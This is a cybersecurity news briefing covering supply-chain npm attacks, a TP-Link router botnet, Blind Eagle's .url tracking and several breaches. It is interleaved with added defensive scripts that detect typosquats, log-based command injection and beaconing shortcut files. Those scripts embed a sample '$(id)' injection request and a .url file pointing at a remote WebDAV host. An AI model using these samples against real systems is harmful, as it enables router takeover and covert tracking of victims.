Cyber Briefing: 2025.03.12
What's trending in cybersecurity today?
Lazarus Group, Fake npm Packages, Steal Crypto, Deploy Backdoors, Telecom Security, SIM Swap Attacks, Ballista Botnet, TP-Link Routers, Remote Code Execution, Apple WebKit, Zero-Day Vulnerability, Blind Eagle Hackers, Colombia, Google Drive, Dropbox, GitHub, Sunflower Medical Group, Data Exposure, San Francisco, City of Sausalito, Hacking Attempt, Yale New Haven Health, Northern Ireland, Belfast Health and Social Care Trust, Patient Records, Moroccan Websites, Cyberattack, Donald Trump, Sean Plankey, US Cybersecurity Agency, Cybersecurity and Infrastructure Security Agency, UK Cybersecurity Industry, Revenue Growth, Job Increases, Cisco, Digital Skills, Insider Threats, Data Breaches, Sola Security, AI No-Code Security Platform.
Welcome to Cyber Briefing, the newsletter that informs you about the latest cybersecurity advisories, alerts, incidents and news every weekday.
First time seeing this? Please subscribe.
The Lazarus Group has been caught hiding backdoors in six fake npm packages, which together have been downloaded about 330 times. The packages steal user credentials and cryptocurrency wallet data and install a persistent backdoor. Their names typosquat legitimate packages, tricking developers into installing them and compromising their systems. Developers are urged to verify the legitimacy of a package before installing it and to stay vigilant against such supply chain attacks.
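Two checks a developer can run before trusting an installed package, as an added example for this briefing (it is not code from the Lazarus packages, from npm or from the researchers who reported them): flag dependency names that are a small edit away from a popular package, and flag lifecycle scripts that run code at install time. The popular-package list and the sample manifests below are constructed for the demo; a real check would use a larger, curated list of names.

```javascript
// Added example, not from the briefing or any npm tooling. Screens package.json
// objects for two red flags common to npm supply-chain attacks: typosquatted
// names and install-time lifecycle hooks. POPULAR and SAMPLE_MANIFESTS are
// constructed for the demo (assumption: a curated list is used in practice).

const POPULAR = ["lodash", "express", "react", "axios", "chalk", "commander"];

// Lifecycle scripts that npm runs automatically for consumers on `npm install`.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall"];

// Levenshtein edit distance between two strings (single-row dynamic programming).
function editDistance(a, b) {
  const prev = Array.from({ length: b.length + 1 }, (_, j) => j);
  for (let i = 1; i <= a.length; i++) {
    let diag = prev[0];
    prev[0] = i;
    for (let j = 1; j <= b.length; j++) {
      const above = prev[j];
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      prev[j] = Math.min(above + 1, prev[j - 1] + 1, diag + cost);
      diag = above;
    }
  }
  return prev[b.length];
}

// Popular packages that `name` is within `maxDistance` edits of; an exact match is not a typosquat.
function findTyposquats(name, popular = POPULAR, maxDistance = 2) {
  const candidate = name.toLowerCase();
  return popular.filter((p) => p !== candidate && editDistance(candidate, p) <= maxDistance);
}

// Install-time lifecycle hooks declared in a package.json object.
function findInstallHooks(manifest) {
  const scripts = manifest.scripts || {};
  return INSTALL_HOOKS.filter((hook) => typeof scripts[hook] === "string");
}

// Audit a list of package.json objects (as found under node_modules); returns findings.
function auditPackages(manifests) {
  const findings = [];
  for (const manifest of manifests) {
    for (const popular of findTyposquats(manifest.name)) {
      findings.push({ kind: "typosquat", name: manifest.name, resembles: popular });
    }
    for (const hook of findInstallHooks(manifest)) {
      findings.push({ kind: "install-hook", name: manifest.name, script: hook, command: manifest.scripts[hook] });
    }
  }
  return findings;
}

// Constructed sample manifests: a genuine popular package, a lookalike that also
// declares a postinstall hook, and an unrelated package that should yield nothing.
const SAMPLE_MANIFESTS = [
  { name: "lodash", version: "4.17.21", scripts: { test: "echo ok" } },
  { name: "lodahs", version: "1.0.0", scripts: { postinstall: "node ./setup.js" } },
  { name: "is-odd", version: "3.0.1" },
];

console.log(JSON.stringify(auditPackages(SAMPLE_MANIFESTS), null, 2));
```

Run it with `node` and the lookalike produces two findings, the genuine and unrelated packages none. An install hook is not malicious by itself, but a hook on a package whose name is one edit from a well-known one is exactly the combination worth stopping to read before `npm install` finishes.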
SIM swap fraud remains a significant threat, despite efforts by telecom providers and regulators to enhance security. Fraudsters gain control of victims' phone numbers by tricking them into authorizing SIM swaps through phishing or social engineering. They exploit weaknesses in telecom systems and bypass safeguards such as biometric authentication and e-verification platforms. The deception often takes the form of a fake job application or account-update request that leads the victim to approve the swap themselves.
A new botnet campaign known as Ballista is targeting vulnerable TP-Link Archer routers, exploiting a severe vulnerability (CVE-2023-1389) to achieve remote code execution. This critical flaw affects TP-Link Archer AX21 routers and has been actively exploited since April 2023. Ballista joins earlier campaigns that used the same flaw to drop Mirai and other malware onto infected devices. The flaw lets an unauthenticated attacker execute commands on the router, giving full control of the device and a foothold for further attacks across the internet.
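What an exploitation attempt looks like in a router's or reverse proxy's access log, and a small detection pass over it, as an added example for this briefing (not Cato's, TP-Link's or the botnet's code). CVE-2023-1389 is a command injection in the `country` parameter of the Archer AX21 web interface's locale form; the exact endpoint shape used below follows public write-ups and is an assumption, and the log lines are constructed using documentation-range addresses.

```javascript
// Added example, not from the briefing. Scans combined-format access log lines
// for requests shaped like CVE-2023-1389 attempts: a locale-form request whose
// decoded `country` value carries shell metacharacters. The endpoint pattern is
// an assumption based on public descriptions; SAMPLE_LOG is constructed.

// Shell metacharacters that have no business in a locale/country value.
const SHELL_META = /[;|&`]|\$\(/;

// Parse one combined-format access log line into its request fields (null if unparseable).
function parseLogLine(line) {
  const m = line.match(/^(\S+) \S+ \S+ \[([^\]]+)\] "(\w+) (\S+) HTTP\/[\d.]+" (\d{3})/);
  if (!m) return null;
  return { ip: m[1], time: m[2], method: m[3], target: m[4], status: Number(m[5]) };
}

// Return a reason string when the request target looks like an injection attempt, else null.
function classifyTarget(target) {
  const q = target.indexOf("?");
  const path = q === -1 ? target : target.slice(0, q);
  const query = q === -1 ? "" : target.slice(q + 1);
  if (!path.endsWith("/locale")) return null;
  const params = new URLSearchParams(query); // percent-decodes values, so %24%28 becomes $(
  if (params.get("form") !== "country") return null;
  const country = params.get("country") || "";
  if (SHELL_META.test(country)) return "shell metacharacters in country parameter";
  return null;
}

// Scan log lines; returns one finding per suspicious request.
function scanLog(lines) {
  const findings = [];
  for (const line of lines) {
    const req = parseLogLine(line);
    if (!req) continue;
    const reason = classifyTarget(req.target);
    if (reason) findings.push({ ip: req.ip, time: req.time, method: req.method, status: req.status, reason });
  }
  return findings;
}

// Constructed sample log: one injection attempt, one benign locale read, one unrelated request.
const SAMPLE_LOG = [
  '203.0.113.5 - - [11/Mar/2025:03:14:07 +0000] "POST /cgi-bin/luci/;stok=/locale?form=country&operation=write&country=%24%28id%29 HTTP/1.1" 200 0 "-" "Mozilla/5.0"',
  '192.0.2.44 - - [11/Mar/2025:03:15:22 +0000] "GET /cgi-bin/luci/;stok=/locale?form=country&operation=read HTTP/1.1" 200 512 "-" "Mozilla/5.0"',
  '198.51.100.9 - - [11/Mar/2025:03:16:01 +0000] "GET /cgi-bin/luci/;stok=/admin/status HTTP/1.1" 200 1024 "-" "Mozilla/5.0"',
];

console.log(scanLog(SAMPLE_LOG));
```

The decoding step matters: botnet scanners percent-encode the payload, so a rule that greps the raw line for `$(` misses it. A legitimate country change (`country=US`) passes, and the same rule ports directly to a SIEM query if the proxy in front of the router logs decoded query strings.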
Apple recently released a security update to fix a critical zero-day vulnerability in WebKit, the engine used by Safari and other apps. Maliciously crafted web content could use the flaw to break out of WebKit's Web Content sandbox, potentially reaching sensitive system data. Apple says it may have been exploited in an extremely sophisticated attack against specific targeted individuals running iOS versions before 17.2, and the new release supplements a fix first shipped in iOS 17.2; the targets and attackers remain undisclosed. The patch is available for iPhones, iPads, Macs, Safari, and Vision Pro, and users should update to the latest iOS, iPadOS, macOS, Safari and visionOS releases.
Blind Eagle (APT-C-36), one of Latin America's most dangerous cyber threat groups, has been targeting Colombia's justice system, government institutions, and private organizations with a series of ongoing attacks. These attacks use sophisticated techniques, including the abuse of trusted cloud services like Google Drive, Dropbox, GitHub, and Bitbucket to distribute malware and bypass traditional security measures. The group's ability to weaponize .url files for passive victim tracking and malware delivery, with minimal user interaction required, makes their campaigns particularly effective.
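Why a .url file can track a victim before anything is "opened", and a check for it, as an added example for this briefing (not Check Point's or the attackers' code). A Windows Internet Shortcut is plain INI text: Explorer fetches the icon named in `IconFile` as soon as the file is displayed in a folder, and opening the shortcut follows `URL`. If either points at a remote UNC or WebDAV host, the victim's machine connects out (and offers NTLM authentication) with no click beyond viewing the folder. The sample files below are constructed; the field names are the standard ones from the .url format.

```javascript
// Added example, not from the briefing. Parses .url (Internet Shortcut) text and
// reports fields that reach out to a remote host. Samples are constructed with
// documentation-range addresses; WorkingDirectory is included as a third field
// that can name a path (assumption: treat it like the other two).

// Minimal INI parser: returns { section: { key: value } }.
function parseIni(text) {
  const sections = {};
  let current = null;
  for (const raw of text.split(/\r?\n/)) {
    const line = raw.trim();
    if (!line || line.startsWith(";")) continue;
    const header = line.match(/^\[(.+)\]$/);
    if (header) {
      current = header[1];
      if (!sections[current]) sections[current] = {};
      continue;
    }
    const eq = line.indexOf("=");
    if (eq === -1 || current === null) continue;
    sections[current][line.slice(0, eq).trim()] = line.slice(eq + 1).trim();
  }
  return sections;
}

// Host named by a UNC path (\\host\share, including \\host@SSL and \\host@80 WebDAV
// forms) or by a file:// URL with a host component; null for local paths and web URLs.
function remoteHost(value) {
  if (!value) return null;
  const unc = value.match(/^\\\\([^\\@]+)(?:@[^\\]+)?\\/);
  if (unc) return unc[1];
  const fileUrl = value.match(/^file:\/\/([^\/\\]+)[\/\\]/i); // file:///C:/... has no host
  if (fileUrl) return fileUrl[1].split("@")[0];
  return null;
}

// Inspect .url file text; returns one finding per field that reaches a remote host.
function inspectUrlFile(text) {
  const shortcut = parseIni(text)["InternetShortcut"] || {};
  const findings = [];
  for (const field of ["URL", "IconFile", "WorkingDirectory"]) {
    const host = remoteHost(shortcut[field]);
    if (host) findings.push({ field, host, value: shortcut[field] });
  }
  return findings;
}

// Constructed samples: a beaconing shortcut and a benign web shortcut.
const SUSPICIOUS_URL_FILE = String.raw`[InternetShortcut]
URL=file://203.0.113.10@80/DavWWWRoot/docs/Notificacion.pdf
IconFile=\\203.0.113.10\share\pdf.ico
IconIndex=0
`;

const BENIGN_URL_FILE = String.raw`[InternetShortcut]
URL=https://www.example.com/
IconFile=C:\Windows\System32\shell32.dll
IconIndex=13
`;

console.log(inspectUrlFile(SUSPICIOUS_URL_FILE));
console.log(inspectUrlFile(BENIGN_URL_FILE));
```

The hosts this returns are the indicators worth blocking at the egress firewall; blocking outbound SMB (445) and WebDAV to the internet removes the beacon channel entirely, which is the control most organizations reach for after seeing this technique.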
Sunflower Medical Group, a Kansas-based healthcare provider, experienced a cyberattack in December 2024, exposing the data of nearly 221,000 patients. Hackers infiltrated the company’s systems on December 15, stealing sensitive information, including Social Security numbers, medical records, and health insurance details. The Rhysida ransomware gang claimed responsibility for the attack, demanding a ransom of $800,000. While the company has not confirmed the involvement of ransomware in the breach, it has offered affected individuals identity theft protection services.
Sausalito’s City Council was forced to cancel a meeting after hackers launched over 190,000 attempts to breach its computer systems in less than 24 hours. The city’s enhanced security protocols, including complex user authentication, successfully blocked the attack. In response, the city is working with its technology contractor, Marin IT, to evaluate the attack’s full impact and reinforce security measures to prevent future breaches.
Yale New Haven Health, based in Connecticut, is investigating a cybersecurity incident that affected its IT services over the weekend. The healthcare system's digital and technology team identified the issue and, in partnership with cybersecurity firm Mandiant, confirmed it as a cyberattack. While patient care has not been impacted, intermittent phone and internet connectivity issues are being addressed as the organization works to restore full system access.
Twenty-eight computers containing thousands of patients' records were stolen from a hospital in Belfast, Northern Ireland. The computers were used to train staff on the new Encompass system for digital healthcare records. While Belfast Health Trust said no data breach occurred and that the missing computers could not access patient records, concerns were raised over the Trust's security measures. The theft, reported on March 5, is believed to have taken place over several months, prompting calls for an urgent reassessment of security protocols.
Several official websites in Morocco experienced a cyberattack on March 9, rendering them inaccessible. Sites like the National Commission for the Protection of Personal Data and the ENCG of Kenitra were affected, displaying error messages or Chinese characters. This attack follows previous cybersecurity incidents in Morocco, which is ranked among the top 25 most targeted countries for cyberattacks worldwide. The attack exposed vulnerabilities in both public and private institutions.
Cyber News
Sean Plankey has been nominated by President Donald Trump to lead the Cybersecurity and Infrastructure Security Agency (CISA), with the nomination now awaiting Senate confirmation. Plankey brings extensive experience in cybersecurity, having previously held key positions at the Department of Energy and the National Security Council during the first Trump administration. His work included maritime and Pacific cybersecurity policy and leading cybersecurity efforts at U.S. Cyber Command.
The UK's cybersecurity industry grew its revenue by 12% to £13.2bn. The sector also added 6,600 full-time jobs, bringing the total to 67,300, with medium and large firms leading the growth. Despite these advances, skills shortages, high salary demands, and SME underinvestment persist and constrain the sector's future potential. The industry has made significant progress but must address these long-standing issues to sustain growth and innovation.
Cisco has announced an ambitious plan to train 1.5 million individuals in digital skills across the European Union by 2030. This initiative, part of the Cisco Networking Academy, will focus on critical areas like AI, cybersecurity, and data science, aiming to address the growing demand for digital literacy. The courses, available in multiple languages, will be free and accessible to a wide audience, contributing to the EU’s Digital Decade targets. By partnering with educational institutions, Cisco hopes to ensure that the workforce is equipped with the necessary skills to thrive in a technology-driven economy.
Human error accounted for 95% of data breaches in 2024, driven mainly by insider threats, credential misuse, and user mistakes. A small group of employees were responsible for the majority of incidents, highlighting the need for more targeted security training. Despite regular employee training, breaches resulted in significant financial losses, averaging $13.9 million per event. Organizations are increasingly turning to AI tools to help defend against cyberattacks, though many still feel unprepared for AI-driven threats.
Sola Security, an Israeli startup founded in 2024 by cybersecurity veterans Guy Flechter and Ron Peled, secured $30 million in seed funding to develop a no-code security platform. The funding round was led by S Capital, Mike Moritz, S32, Glilot Capital Partners, and several angel investors. The company aims to simplify security by offering a platform where security teams can build and deploy custom applications without needing extensive technical expertise.
Copyright © 2025 CyberMaterial. All Rights Reserved.